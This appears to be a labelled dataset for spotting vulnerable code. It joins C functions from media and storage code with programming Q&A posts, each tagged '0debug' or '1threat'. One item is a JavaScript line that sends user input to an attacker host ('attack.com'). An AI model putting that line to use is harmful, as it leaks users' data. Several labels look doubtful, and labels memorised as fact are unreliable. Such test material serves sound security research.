static int transcode(AVFormatContext **output_files, int nb_output_files, AVFormatContext **input_files, int nb_input_files, AVStreamMap *stream_maps, int nb_stream_maps) { int ret = 0, i, j, k, n, nb_istreams = 0, nb_ostreams = 0, step; AVFormatContext *is, *os; AVCodecContext *codec, *icodec; AVOutputStream *ost, **ost_table = NULL; AVInputStream *ist, **ist_table = NULL; AVInputFile *file_table; char error[1024]; int key; int want_sdp = 1; uint8_t no_packet[MAX_FILES]={0}; int no_packet_count=0; int nb_frame_threshold[AVMEDIA_TYPE_NB]={0}; int nb_streams[AVMEDIA_TYPE_NB]={0}; file_table= av_mallocz(nb_input_files * sizeof(AVInputFile)); if (!file_table) goto fail; j = 0; for(i=0;i<nb_input_files;i++) { is = input_files[i]; file_table[i].ist_index = j; file_table[i].nb_streams = is->nb_streams; j += is->nb_streams; } nb_istreams = j; ist_table = av_mallocz(nb_istreams * sizeof(AVInputStream *)); if (!ist_table) goto fail; for(i=0;i<nb_istreams;i++) { ist = av_mallocz(sizeof(AVInputStream)); if (!ist) goto fail; ist_table[i] = ist; } j = 0; for(i=0;i<nb_input_files;i++) { is = input_files[i]; for(k=0;k<is->nb_streams;k++) { ist = ist_table[j++]; ist->st = is->streams[k]; ist->file_index = i; ist->index = k; ist->discard = 1; if (rate_emu) { ist->start = av_gettime(); } } } nb_ostreams = 0; for(i=0;i<nb_output_files;i++) { os = output_files[i]; if (!os->nb_streams && !(os->oformat->flags & AVFMT_NOSTREAMS)) { av_dump_format(output_files[i], i, output_files[i]->filename, 1); fprintf(stderr, "Output file #%d does not contain any stream\n", i); ret = AVERROR(EINVAL); goto fail; } nb_ostreams += os->nb_streams; } if (nb_stream_maps > 0 && nb_stream_maps != nb_ostreams) { fprintf(stderr, "Number of stream maps must match number of output streams\n"); ret = AVERROR(EINVAL); goto fail; } for(i=0;i<nb_stream_maps;i++) { int fi = stream_maps[i].file_index; int si = stream_maps[i].stream_index; if (fi < 0 || fi > nb_input_files - 1 || si < 0 || si > file_table[fi].nb_streams - 1) { fprintf(stderr,"Could not find input stream #%d.%d\n", fi, si); ret = AVERROR(EINVAL); goto fail; } fi = stream_maps[i].sync_file_index; si = stream_maps[i].sync_stream_index; if (fi < 0 || fi > nb_input_files - 1 || si < 0 || si > file_table[fi].nb_streams - 1) { fprintf(stderr,"Could not find sync stream #%d.%d\n", fi, si); ret = AVERROR(EINVAL); goto fail; } } ost_table = av_mallocz(sizeof(AVOutputStream *) * nb_ostreams); if (!ost_table) goto fail; for(k=0;k<nb_output_files;k++) { os = output_files[k]; for(i=0;i<os->nb_streams;i++,n++) { nb_streams[os->streams[i]->codec->codec_type]++; } } for(step=1<<30; step; step>>=1){ int found_streams[AVMEDIA_TYPE_NB]={0}; for(j=0; j<AVMEDIA_TYPE_NB; j++) nb_frame_threshold[j] += step; for(j=0; j<nb_istreams; j++) { int skip=0; ist = ist_table[j]; if(opt_programid){ int pi,si; AVFormatContext *f= input_files[ ist->file_index ]; skip=1; for(pi=0; pi<f->nb_programs; pi++){ AVProgram *p= f->programs[pi]; if(p->id == opt_programid) for(si=0; si<p->nb_stream_indexes; si++){ if(f->streams[ p->stream_index[si] ] == ist->st) skip=0; } } } if (ist->discard && ist->st->discard != AVDISCARD_ALL && !skip && nb_frame_threshold[ist->st->codec->codec_type] <= ist->st->codec_info_nb_frames){ found_streams[ist->st->codec->codec_type]++; } } for(j=0; j<AVMEDIA_TYPE_NB; j++) if(found_streams[j] < nb_streams[j]) nb_frame_threshold[j] -= step; } n = 0; for(k=0;k<nb_output_files;k++) { os = output_files[k]; for(i=0;i<os->nb_streams;i++,n++) { int found; ost = ost_table[n] = output_streams_for_file[k][i]; ost->st = os->streams[i]; if (nb_stream_maps > 0) { ost->source_index = file_table[stream_maps[n].file_index].ist_index + stream_maps[n].stream_index; if (ist_table[ost->source_index]->st->codec->codec_type != ost->st->codec->codec_type) { int i= ost->file_index; av_dump_format(output_files[i], i, output_files[i]->filename, 1); fprintf(stderr, "Codec type mismatch for mapping #%d.%d -> #%d.%d\n", stream_maps[n].file_index, stream_maps[n].stream_index, ost->file_index, ost->index); ffmpeg_exit(1); } } else { found = 0; for(j=0;j<nb_istreams;j++) { int skip=0; ist = ist_table[j]; if(opt_programid){ int pi,si; AVFormatContext *f= input_files[ ist->file_index ]; skip=1; for(pi=0; pi<f->nb_programs; pi++){ AVProgram *p= f->programs[pi]; if(p->id == opt_programid) for(si=0; si<p->nb_stream_indexes; si++){ if(f->streams[ p->stream_index[si] ] == ist->st) skip=0; } } } if (ist->discard && ist->st->discard != AVDISCARD_ALL && !skip && ist->st->codec->codec_type == ost->st->codec->codec_type && nb_frame_threshold[ist->st->codec->codec_type] <= ist->st->codec_info_nb_frames) { ost->source_index = j; found = 1; break; } } if (!found) { if(! opt_programid) { for(j=0;j<nb_istreams;j++) { ist = ist_table[j]; if ( ist->st->codec->codec_type == ost->st->codec->codec_type && ist->st->discard != AVDISCARD_ALL) { ost->source_index = j; found = 1; } } } if (!found) { int i= ost->file_index; av_dump_format(output_files[i], i, output_files[i]->filename, 1); fprintf(stderr, "Could not find input stream matching output stream #%d.%d\n", ost->file_index, ost->index); ffmpeg_exit(1); } } } ist = ist_table[ost->source_index]; ist->discard = 0; ost->sync_ist = (nb_stream_maps > 0) ? ist_table[file_table[stream_maps[n].sync_file_index].ist_index + stream_maps[n].sync_stream_index] : ist; } } for(i=0;i<nb_ostreams;i++) { ost = ost_table[i]; os = output_files[ost->file_index]; ist = ist_table[ost->source_index]; codec = ost->st->codec; icodec = ist->st->codec; if (metadata_streams_autocopy) av_metadata_copy(&ost->st->metadata, ist->st->metadata, AV_METADATA_DONT_OVERWRITE); ost->st->disposition = ist->st->disposition; codec->bits_per_raw_sample= icodec->bits_per_raw_sample; codec->chroma_sample_location = icodec->chroma_sample_location; if (ost->st->stream_copy) { uint64_t extra_size = (uint64_t)icodec->extradata_size + FF_INPUT_BUFFER_PADDING_SIZE; if (extra_size > INT_MAX) goto fail; codec->codec_id = icodec->codec_id; codec->codec_type = icodec->codec_type; if(!codec->codec_tag){ if( !os->oformat->codec_tag || av_codec_get_id (os->oformat->codec_tag, icodec->codec_tag) == codec->codec_id || av_codec_get_tag(os->oformat->codec_tag, icodec->codec_id) <= 0) codec->codec_tag = icodec->codec_tag; } codec->bit_rate = icodec->bit_rate; codec->rc_max_rate = icodec->rc_max_rate; codec->rc_buffer_size = icodec->rc_buffer_size; codec->extradata= av_mallocz(extra_size); if (!codec->extradata) goto fail; memcpy(codec->extradata, icodec->extradata, icodec->extradata_size); codec->extradata_size= icodec->extradata_size; if(!copy_tb && av_q2d(icodec->time_base)*icodec->ticks_per_frame > av_q2d(ist->st->time_base) && av_q2d(ist->st->time_base) < 1.0/500){ codec->time_base = icodec->time_base; codec->time_base.num *= icodec->ticks_per_frame; av_reduce(&codec->time_base.num, &codec->time_base.den, codec->time_base.num, codec->time_base.den, INT_MAX); }else codec->time_base = ist->st->time_base; switch(codec->codec_type) { case AVMEDIA_TYPE_AUDIO: if(audio_volume != 256) { fprintf(stderr,"-acodec copy and -vol are incompatible (frames are not decoded)\n"); ffmpeg_exit(1); } codec->channel_layout = icodec->channel_layout; codec->sample_rate = icodec->sample_rate; codec->channels = icodec->channels; codec->frame_size = icodec->frame_size; codec->audio_service_type = icodec->audio_service_type; codec->block_align= icodec->block_align; if(codec->block_align == 1 && codec->codec_id == CODEC_ID_MP3) codec->block_align= 0; if(codec->codec_id == CODEC_ID_AC3) codec->block_align= 0; break; case AVMEDIA_TYPE_VIDEO: codec->pix_fmt = icodec->pix_fmt; codec->width = icodec->width; codec->height = icodec->height; codec->has_b_frames = icodec->has_b_frames; break; case AVMEDIA_TYPE_SUBTITLE: codec->width = icodec->width; codec->height = icodec->height; break; default: abort(); } } else { switch(codec->codec_type) { case AVMEDIA_TYPE_AUDIO: ost->fifo= av_fifo_alloc(1024); if(!ost->fifo) goto fail; ost->reformat_pair = MAKE_SFMT_PAIR(AV_SAMPLE_FMT_NONE,AV_SAMPLE_FMT_NONE); ost->audio_resample = codec->sample_rate != icodec->sample_rate || audio_sync_method > 1; icodec->request_channels = codec->channels; ist->decoding_needed = 1; ost->encoding_needed = 1; ost->resample_sample_fmt = icodec->sample_fmt; ost->resample_sample_rate = icodec->sample_rate; ost->resample_channels = icodec->channels; break; case AVMEDIA_TYPE_VIDEO: if (ost->st->codec->pix_fmt == PIX_FMT_NONE) { fprintf(stderr, "Video pixel format is unknown, stream cannot be encoded\n"); ffmpeg_exit(1); } ost->video_resample = (codec->width != icodec->width || codec->height != icodec->height || (codec->pix_fmt != icodec->pix_fmt)); if (ost->video_resample) { #if !CONFIG_AVFILTER avcodec_get_frame_defaults(&ost->pict_tmp); if(avpicture_alloc((AVPicture*)&ost->pict_tmp, codec->pix_fmt, codec->width, codec->height)) { fprintf(stderr, "Cannot allocate temp picture, check pix fmt\n"); ffmpeg_exit(1); } sws_flags = av_get_int(sws_opts, "sws_flags", NULL); ost->img_resample_ctx = sws_getContext( icodec->width, icodec->height, icodec->pix_fmt, codec->width, codec->height, codec->pix_fmt, sws_flags, NULL, NULL, NULL); if (ost->img_resample_ctx == NULL) { fprintf(stderr, "Cannot get resampling context\n"); ffmpeg_exit(1); } ost->original_height = icodec->height; ost->original_width = icodec->width; #endif codec->bits_per_raw_sample= 0; } ost->resample_height = icodec->height; ost->resample_width = icodec->width; ost->resample_pix_fmt= icodec->pix_fmt; ost->encoding_needed = 1; ist->decoding_needed = 1; #if CONFIG_AVFILTER if (configure_filters(ist, ost)) { fprintf(stderr, "Error opening filters!\n"); exit(1); } #endif break; case AVMEDIA_TYPE_SUBTITLE: ost->encoding_needed = 1; ist->decoding_needed = 1; break; default: abort(); break; } if (ost->encoding_needed && (codec->flags & (CODEC_FLAG_PASS1 | CODEC_FLAG_PASS2))) { char logfilename[1024]; FILE *f; snprintf(logfilename, sizeof(logfilename), "%s-%d.log", pass_logfilename_prefix ? pass_logfilename_prefix : DEFAULT_PASS_LOGFILENAME_PREFIX, i); if (codec->flags & CODEC_FLAG_PASS1) { f = fopen(logfilename, "wb"); if (!f) { fprintf(stderr, "Cannot write log file '%s' for pass-1 encoding: %s\n", logfilename, strerror(errno)); ffmpeg_exit(1); } ost->logfile = f; } else { char *logbuffer; size_t logbuffer_size; if (read_file(logfilename, &logbuffer, &logbuffer_size) < 0) { fprintf(stderr, "Error reading log file '%s' for pass-2 encoding\n", logfilename); ffmpeg_exit(1); } codec->stats_in = logbuffer; } } } if(codec->codec_type == AVMEDIA_TYPE_VIDEO){ int size= codec->width * codec->height; bit_buffer_size= FFMAX(bit_buffer_size, 6*size + 1664); } } if (!bit_buffer) bit_buffer = av_malloc(bit_buffer_size); if (!bit_buffer) { fprintf(stderr, "Cannot allocate %d bytes output buffer\n", bit_buffer_size); ret = AVERROR(ENOMEM); goto fail; } for(i=0;i<nb_ostreams;i++) { ost = ost_table[i]; if (ost->encoding_needed) { AVCodec *codec = i < nb_output_codecs ? output_codecs[i] : NULL; AVCodecContext *dec = ist_table[ost->source_index]->st->codec; if (!codec) codec = avcodec_find_encoder(ost->st->codec->codec_id); if (!codec) { snprintf(error, sizeof(error), "Encoder (codec id %d) not found for output stream #%d.%d", ost->st->codec->codec_id, ost->file_index, ost->index); ret = AVERROR(EINVAL); goto dump_format; } if (dec->subtitle_header) { ost->st->codec->subtitle_header = av_malloc(dec->subtitle_header_size); if (!ost->st->codec->subtitle_header) { ret = AVERROR(ENOMEM); goto dump_format; } memcpy(ost->st->codec->subtitle_header, dec->subtitle_header, dec->subtitle_header_size); ost->st->codec->subtitle_header_size = dec->subtitle_header_size; } if (avcodec_open(ost->st->codec, codec) < 0) { snprintf(error, sizeof(error), "Error while opening encoder for output stream #%d.%d - maybe incorrect parameters such as bit_rate, rate, width or height", ost->file_index, ost->index); ret = AVERROR(EINVAL); goto dump_format; } extra_size += ost->st->codec->extradata_size; } } for(i=0;i<nb_istreams;i++) { ist = ist_table[i]; if (ist->decoding_needed) { AVCodec *codec = i < nb_input_codecs ? input_codecs[i] : NULL; if (!codec) codec = avcodec_find_decoder(ist->st->codec->codec_id); if (!codec) { snprintf(error, sizeof(error), "Decoder (codec id %d) not found for input stream #%d.%d", ist->st->codec->codec_id, ist->file_index, ist->index); ret = AVERROR(EINVAL); goto dump_format; } if (avcodec_open(ist->st->codec, codec) < 0) { snprintf(error, sizeof(error), "Error while opening decoder for input stream #%d.%d", ist->file_index, ist->index); ret = AVERROR(EINVAL); goto dump_format; } } } for(i=0;i<nb_istreams;i++) { AVStream *st; ist = ist_table[i]; st= ist->st; ist->pts = st->avg_frame_rate.num ? - st->codec->has_b_frames*AV_TIME_BASE / av_q2d(st->avg_frame_rate) : 0; ist->next_pts = AV_NOPTS_VALUE; ist->is_start = 1; } for (i=0;i<nb_meta_data_maps;i++) { AVFormatContext *files[2]; AVMetadata **meta[2]; int j; #define METADATA_CHECK_INDEX(index, nb_elems, desc)\ if ((index) < 0 || (index) >= (nb_elems)) {\ snprintf(error, sizeof(error), "Invalid %s index %d while processing metadata maps\n",\ (desc), (index));\ ret = AVERROR(EINVAL);\ goto dump_format;\ } int out_file_index = meta_data_maps[i][0].file; int in_file_index = meta_data_maps[i][1].file; if (in_file_index < 0 || out_file_index < 0) continue; METADATA_CHECK_INDEX(out_file_index, nb_output_files, "output file") METADATA_CHECK_INDEX(in_file_index, nb_input_files, "input file") files[0] = output_files[out_file_index]; files[1] = input_files[in_file_index]; for (j = 0; j < 2; j++) { AVMetaDataMap *map = &meta_data_maps[i][j]; switch (map->type) { case 'g': meta[j] = &files[j]->metadata; break; case 's': METADATA_CHECK_INDEX(map->index, files[j]->nb_streams, "stream") meta[j] = &files[j]->streams[map->index]->metadata; break; case 'c': METADATA_CHECK_INDEX(map->index, files[j]->nb_chapters, "chapter") meta[j] = &files[j]->chapters[map->index]->metadata; break; case 'p': METADATA_CHECK_INDEX(map->index, files[j]->nb_programs, "program") meta[j] = &files[j]->programs[map->index]->metadata; break; } } av_metadata_copy(meta[0], *meta[1], AV_METADATA_DONT_OVERWRITE); } if (metadata_global_autocopy) { for (i = 0; i < nb_output_files; i++) av_metadata_copy(&output_files[i]->metadata, input_files[0]->metadata, AV_METADATA_DONT_OVERWRITE); } for (i = 0; i < nb_chapter_maps; i++) { int infile = chapter_maps[i].in_file; int outfile = chapter_maps[i].out_file; if (infile < 0 || outfile < 0) continue; if (infile >= nb_input_files) { snprintf(error, sizeof(error), "Invalid input file index %d in chapter mapping.\n", infile); ret = AVERROR(EINVAL); goto dump_format; } if (outfile >= nb_output_files) { snprintf(error, sizeof(error), "Invalid output file index %d in chapter mapping.\n",outfile); ret = AVERROR(EINVAL); goto dump_format; } copy_chapters(infile, outfile); } if (!nb_chapter_maps) for (i = 0; i < nb_input_files; i++) { if (!input_files[i]->nb_chapters) continue; for (j = 0; j < nb_output_files; j++) if ((ret = copy_chapters(i, j)) < 0) goto dump_format; break; } for(i=0;i<nb_output_files;i++) { os = output_files[i]; if (av_write_header(os) < 0) { snprintf(error, sizeof(error), "Could not write header for output file #%d (incorrect codec parameters ?)", i); ret = AVERROR(EINVAL); goto dump_format; } if (strcmp(output_files[i]->oformat->name, "rtp")) { want_sdp = 0; } } dump_format: for(i=0;i<nb_output_files;i++) { av_dump_format(output_files[i], i, output_files[i]->filename, 1); } if (verbose >= 0) { fprintf(stderr, "Stream mapping:\n"); for(i=0;i<nb_ostreams;i++) { ost = ost_table[i]; fprintf(stderr, " Stream #%d.%d -> #%d.%d", ist_table[ost->source_index]->file_index, ist_table[ost->source_index]->index, ost->file_index, ost->index); if (ost->sync_ist != ist_table[ost->source_index]) fprintf(stderr, " [sync #%d.%d]", ost->sync_ist->file_index, ost->sync_ist->index); fprintf(stderr, "\n"); } } if (ret) { fprintf(stderr, "%s\n", error); goto fail; } if (want_sdp) { print_sdp(output_files, nb_output_files); } if (!using_stdin) { if(verbose >= 0) fprintf(stderr, "Press [q] to stop encoding\n"); url_set_interrupt_cb(decode_interrupt_cb); } term_init(); timer_start = av_gettime(); for(; received_sigterm == 0;) { int file_index, ist_index; AVPacket pkt; double ipts_min; double opts_min; redo: ipts_min= 1e100; opts_min= 1e100; if (!using_stdin) { if (q_pressed) break; key = read_key(); if (key == 'q') break; } file_index = -1; for(i=0;i<nb_ostreams;i++) { double ipts, opts; ost = ost_table[i]; os = output_files[ost->file_index]; ist = ist_table[ost->source_index]; if(ist->is_past_recording_time || no_packet[ist->file_index]) continue; opts = ost->st->pts.val * av_q2d(ost->st->time_base); ipts = (double)ist->pts; if (!file_table[ist->file_index].eof_reached){ if(ipts < ipts_min) { ipts_min = ipts; if(input_sync ) file_index = ist->file_index; } if(opts < opts_min) { opts_min = opts; if(!input_sync) file_index = ist->file_index; } } if(ost->frame_number >= max_frames[ost->st->codec->codec_type]){ file_index= -1; break; } } if (file_index < 0) { if(no_packet_count){ no_packet_count=0; memset(no_packet, 0, sizeof(no_packet)); usleep(10000); continue; } break; } if (limit_filesize != 0 && limit_filesize <= avio_tell(output_files[0]->pb)) break; is = input_files[file_index]; ret= av_read_frame(is, &pkt); if(ret == AVERROR(EAGAIN)){ no_packet[file_index]=1; no_packet_count++; continue; } if (ret < 0) { file_table[file_index].eof_reached = 1; if (opt_shortest) break; else continue; } no_packet_count=0; memset(no_packet, 0, sizeof(no_packet)); if (do_pkt_dump) { av_pkt_dump_log2(NULL, AV_LOG_DEBUG, &pkt, do_hex_dump, is->streams[pkt.stream_index]); } if (pkt.stream_index >= file_table[file_index].nb_streams) goto discard_packet; ist_index = file_table[file_index].ist_index + pkt.stream_index; ist = ist_table[ist_index]; if (ist->discard) goto discard_packet; if (pkt.dts != AV_NOPTS_VALUE) pkt.dts += av_rescale_q(input_files_ts_offset[ist->file_index], AV_TIME_BASE_Q, ist->st->time_base); if (pkt.pts != AV_NOPTS_VALUE) pkt.pts += av_rescale_q(input_files_ts_offset[ist->file_index], AV_TIME_BASE_Q, ist->st->time_base); if (pkt.stream_index < nb_input_files_ts_scale[file_index] && input_files_ts_scale[file_index][pkt.stream_index]){ if(pkt.pts != AV_NOPTS_VALUE) pkt.pts *= input_files_ts_scale[file_index][pkt.stream_index]; if(pkt.dts != AV_NOPTS_VALUE) pkt.dts *= input_files_ts_scale[file_index][pkt.stream_index]; } if (pkt.dts != AV_NOPTS_VALUE && ist->next_pts != AV_NOPTS_VALUE && (is->iformat->flags & AVFMT_TS_DISCONT)) { int64_t pkt_dts= av_rescale_q(pkt.dts, ist->st->time_base, AV_TIME_BASE_Q); int64_t delta= pkt_dts - ist->next_pts; if((FFABS(delta) > 1LL*dts_delta_threshold*AV_TIME_BASE || pkt_dts+1<ist->pts)&& !copy_ts){ input_files_ts_offset[ist->file_index]-= delta; if (verbose > 2) fprintf(stderr, "timestamp discontinuity %"PRId64", new offset= %"PRId64"\n", delta, input_files_ts_offset[ist->file_index]); pkt.dts-= av_rescale_q(delta, AV_TIME_BASE_Q, ist->st->time_base); if(pkt.pts != AV_NOPTS_VALUE) pkt.pts-= av_rescale_q(delta, AV_TIME_BASE_Q, ist->st->time_base); } } if (recording_time != INT64_MAX && av_compare_ts(pkt.pts, ist->st->time_base, recording_time + start_time, (AVRational){1, 1000000}) >= 0) { ist->is_past_recording_time = 1; goto discard_packet; } if (output_packet(ist, ist_index, ost_table, nb_ostreams, &pkt) < 0) { if (verbose >= 0) fprintf(stderr, "Error while decoding stream #%d.%d\n", ist->file_index, ist->index); if (exit_on_error) ffmpeg_exit(1); av_free_packet(&pkt); goto redo; } discard_packet: av_free_packet(&pkt); print_report(output_files, ost_table, nb_ostreams, 0); } for(i=0;i<nb_istreams;i++) { ist = ist_table[i]; if (ist->decoding_needed) { output_packet(ist, i, ost_table, nb_ostreams, NULL); } } term_exit(); for(i=0;i<nb_output_files;i++) { os = output_files[i]; av_write_trailer(os); } print_report(output_files, ost_table, nb_ostreams, 1); for(i=0;i<nb_ostreams;i++) { ost = ost_table[i]; if (ost->encoding_needed) { av_freep(&ost->st->codec->stats_in); avcodec_close(ost->st->codec); } #if CONFIG_AVFILTER avfilter_graph_free(&ost->graph); #endif } for(i=0;i<nb_istreams;i++) { ist = ist_table[i]; if (ist->decoding_needed) { avcodec_close(ist->st->codec); } } ret = 0; fail: av_freep(&bit_buffer); av_free(file_table); if (ist_table) { for(i=0;i<nb_istreams;i++) { ist = ist_table[i]; av_free(ist); } av_free(ist_table); } if (ost_table) { for(i=0;i<nb_ostreams;i++) { ost = ost_table[i]; if (ost) { if (ost->st->stream_copy) av_freep(&ost->st->codec->extradata); if (ost->logfile) { fclose(ost->logfile); ost->logfile = NULL; } av_fifo_free(ost->fifo); av_freep(&ost->st->codec->subtitle_header); av_free(ost->pict_tmp.data[0]); av_free(ost->forced_kf_pts); if (ost->video_resample) sws_freeContext(ost->img_resample_ctx); if (ost->resample) audio_resample_close(ost->resample); if (ost->reformat_ctx) av_audio_convert_free(ost->reformat_ctx); av_free(ost); } } av_free(ost_table); } return ret; }
1threat
Format timestamp according to RFC 3339 with moment.js : <p>Like this:</p> <pre><code>const RFC_3339 = 'YYYY-MM-DDTHH:mm:ss'; moment.utc().format(RFC_3339); </code></pre> <p>I need the timestamp to have a 'Z' at the end. Is there a better way than just <code>+'Z'</code>?</p> <p>It should match the python code on the backend: </p> <pre><code>RFC_3339_FMT = "%Y-%m-%dT%H:%M:%SZ" </code></pre>
0debug
What to change for this StringByApppendingPathComponent : My Swift code is not working after converting to Swift2.2. My code : Swift 1.0 code: Class func getPath(filename: String ) -> String { return NSSearchPathForDirectoriesInDomains(NSSearchPathDirectory.DocumentDirectory,NSSearchPathDomainMask.UserDomainMask,true)[0].stringByAppendingComponent(filename) } Please help. Thanks
0debug
C#: Writealltext in loop randomly doesn't write to file : <p>I created an executable which uses an API call to get information and writes it to a file with System.IO.File.WriteAllText . In SSIS i execute the file in a loop with a list of parameters (needs to loop around 3000 times). Everything goes fine, but after a random amount of executes (differs every time i execute although the order of execution remains the same) it fails to create and write to a file. The file doesn't exist. The executable doesn't encounter an error either. So when i want to read from my file in the next step of my loop, it fails. </p> <p>I have tried to write a try catch block around my code but it still doesn't return any errors. In my loop i always deleted the files after i read them. Now i just let the files stay in the folder so it doesn't exit my loop (as it sometimes creates the file and sometimes it doesn't. That way i can go through my whole loop but it doesn't help not knowing if some files were not updated.</p> <p>I'm currently out of ideas to try, since to me, the "error" appears completely random and because the program doesn't recognize the fault it's hard to troubleshoot.</p>
0debug
static void nfs_file_close(BlockDriverState *bs) { NFSClient *client = bs->opaque; nfs_client_close(client); qemu_mutex_destroy(&client->mutex); }
1threat
static inline void h264_loop_filter_luma_c(uint8_t *pix, int xstride, int ystride, int alpha, int beta, int8_t *tc0) { int i, d; for( i = 0; i < 4; i++ ) { if( tc0[i] < 0 ) { pix += 4*ystride; continue; } for( d = 0; d < 4; d++ ) { const int p0 = pix[-1*xstride]; const int p1 = pix[-2*xstride]; const int p2 = pix[-3*xstride]; const int q0 = pix[0]; const int q1 = pix[1*xstride]; const int q2 = pix[2*xstride]; if( FFABS( p0 - q0 ) < alpha && FFABS( p1 - p0 ) < beta && FFABS( q1 - q0 ) < beta ) { int tc = tc0[i]; int i_delta; if( FFABS( p2 - p0 ) < beta ) { if(tc0[i]) pix[-2*xstride] = p1 + av_clip( (( p2 + ( ( p0 + q0 + 1 ) >> 1 ) ) >> 1) - p1, -tc0[i], tc0[i] ); tc++; } if( FFABS( q2 - q0 ) < beta ) { if(tc0[i]) pix[ xstride] = q1 + av_clip( (( q2 + ( ( p0 + q0 + 1 ) >> 1 ) ) >> 1) - q1, -tc0[i], tc0[i] ); tc++; } i_delta = av_clip( (((q0 - p0 ) << 2) + (p1 - q1) + 4) >> 3, -tc, tc ); pix[-xstride] = av_clip_uint8( p0 + i_delta ); pix[0] = av_clip_uint8( q0 - i_delta ); } pix += ystride; } } }
1threat
static int decode_main_header(NUTContext *nut){ AVFormatContext *s= nut->avf; ByteIOContext *bc = &s->pb; uint64_t tmp; int i, j; get_packetheader(nut, bc, 8, 1); tmp = get_v(bc); if (tmp != 1){ av_log(s, AV_LOG_ERROR, "bad version (%Ld)\n", tmp); return -1; } nut->stream_count = get_v(bc); get_v(bc); for(i=0; i<256;){ int tmp_flags = get_v(bc); int tmp_stream= get_v(bc); int tmp_mul = get_v(bc); int tmp_size = get_v(bc); int count = get_v(bc); if(count == 0 || i+count > 256){ av_log(s, AV_LOG_ERROR, "illegal count %d at %d\n", count, i); return -1; } if((tmp_flags & FLAG_FRAME_TYPE) && tmp_flags != 1){ if(tmp_flags & FLAG_PRED_KEY_FRAME){ av_log(s, AV_LOG_ERROR, "keyframe prediction in non 0 frame type\n"); return -1; } if(!(tmp_flags & FLAG_PTS) || !(tmp_flags & FLAG_FULL_PTS) ){ av_log(s, AV_LOG_ERROR, "no full pts in non 0 frame type\n"); return -1; } } for(j=0; j<count; j++,i++){ if(tmp_stream > nut->stream_count + 1){ av_log(s, AV_LOG_ERROR, "illegal stream number\n"); return -1; } nut->frame_code[i].flags = tmp_flags ; nut->frame_code[i].stream_id_plus1 = tmp_stream; nut->frame_code[i].size_mul = tmp_mul ; nut->frame_code[i].size_lsb = tmp_size ; if(++tmp_size >= tmp_mul){ tmp_size=0; tmp_stream++; } } } if(nut->frame_code['N'].flags != 1){ av_log(s, AV_LOG_ERROR, "illegal frame_code table\n"); return -1; } if(check_checksum(bc)){ av_log(s, AV_LOG_ERROR, "Main header checksum missmatch\n"); return -1; } return 0; }
1threat
C++ unordered_map insert into vector : <p>I am trying to write a program which will take list of strings as input and create hash table with string name and its position.</p> <p>Example:<br> vector words {"first", "second", "third", "forth", "second"};</p> <p>output:<br> first 1<br> second 2,5<br> third 3<br> forth 4 </p> <p>I am facing two problems please find them in code comment below.<br> Please tell me what am i doing wrong?</p> <pre><code>int main() { vector&lt;string&gt; words {"first", "second", "third", "forth", "second"}; unordered_map&lt;string, vector&lt;int&gt;&gt; hash_table; unordered_map&lt;string, vector&lt;int&gt;&gt;::const_iterator hash_it; int loc = 1; for(auto n = words.begin(); n != words.end(); ++n){ hash_it = hash_table.find(*n); if(hash_it == hash_table.end()) hash_table.insert(make_pair(*n, vector&lt;int&gt; (loc))); else //hash_it-&gt;second.push_back(loc); //Problem 1 - this statement gives error ++loc; } for(auto&amp; n:hash_table){ cout&lt;&lt;"Word - "&lt;&lt;n.first&lt;&lt;" Loc -"; vector&lt;int&gt; tmp1 = n.second; for(auto j = tmp1.begin(); j != tmp1.end(); ++j) cout&lt;&lt;" "&lt;&lt;*j; cout&lt;&lt;endl; } } </code></pre> <p>Problem 2 - location values are 0<br> Output of program -<br> Word - forth Loc - 0<br> Word - third Loc - 0<br> Word - second Loc - 0<br> Word - first Loc - 0 </p>
0debug
sql query to get all rows if there is no matching row in left join : I've table structure like this: person (pid, pname) personSamples(sid,pid,sampleName) groups(gid,groupName) groupPersons(gpid,gid,pid) grouppersonSamples(gpsid,gid,sid) Whenever a person is added to a group i.e. in groupPersons table, I add some selected samples of person in grouppersonSamples table. The requirement is, if I do not insert any row in grouppersonSamples then select all from personSamples for a given person and group. What I have to do is left join with grouppersonSamples and check if there is no matching row in grouppersonSamples then execute another query to select all from personSamples for given pid. Is there any way to get all in single query?
0debug
static int graph_config_formats(AVFilterGraph *graph, AVClass *log_ctx) { int ret; if ((ret = query_formats(graph, log_ctx)) < 0) return ret; reduce_formats(graph); swap_sample_fmts(graph); swap_samplerates(graph); swap_channel_layouts(graph); if ((ret = pick_formats(graph)) < 0) return ret; return 0; }
1threat
How to call main function from another header files's cpp file : i want to call main function form another header file's cpp file. where main included a header file. lets call main.cpp has a header file. can i call main.cpp's main form header file's cpp . This is main.cpp ``` #include "another.h" int main() { cout<<"Main"; } ``` this is another.h ```class another { public: void another_func(void); }; ``` this is another_func.cpp separate file ```void another::another_func(void) { //how do i call main() } ```
0debug
window.location.href = 'http://attack.com?user=' + user_input;
1threat
static void mirror_drain(MirrorBlockJob *s) { while (s->in_flight > 0) { mirror_wait_for_io(s); } }
1threat
How to configure ASP.net Core server routing for multiple SPAs hosted with SpaServices : <p>I have an Angular 5 application that I want to host with Angular Universal on ASP.net Core using the latest <a href="https://docs.microsoft.com/en-us/aspnet/core/spa/angular" rel="noreferrer">Angular template RC</a>. I've followed the docs and have the application up and running. The problem is that I am also using Angular's <a href="https://angular.io/guide/i18n" rel="noreferrer">i18n tools</a>, which produce multiple compiled applications, 1 per locale. I need to be able to host each from <code>https://myhost.com/{locale}/</code>.</p> <p>I know that I can spin up an instance of the ASP.net Core app for each locale, and set up hosting in the webserver to have the appropriate paths route to the associated app, but this seems excessive to me.</p> <p>Routes are configured with:</p> <pre class="lang-cs prettyprint-override"><code>// app is an instance of Microsoft.AspNetCore.Builder.IApplicationBuilder app.UseMvc(routes =&gt; { routes.MapRoute( name: "default", template: "{controller}/{action=Index}/{id?}"); }); </code></pre> <p>SpaServices are configured with:</p> <pre class="lang-cs prettyprint-override"><code>app.UseSpa(spa =&gt; { // To learn more about options for serving an Angular SPA from ASP.NET Core, // see https://go.microsoft.com/fwlink/?linkid=864501 spa.Options.SourcePath = "ClientApp"; spa.UseSpaPrerendering(options =&gt; { options.BootModulePath = $"{spa.Options.SourcePath}/dist-server/main.bundle.js"; options.BootModuleBuilder = env.IsDevelopment() ? new AngularCliBuilder(npmScript: "build:ssr:en") : null; options.ExcludeUrls = new[] { "/sockjs-node" }; options.SupplyData = (context, data) =&gt; { data["foo"] = "bar"; }; }); if (env.IsDevelopment()) { spa.UseAngularCliServer(npmScript: "start"); } }); </code></pre> <p>I've looked through the documentation and the source on Github, and I cannot find how to configure ASP.net Core to associate a specific route with a given SPA. Anyone have any ideas?</p>
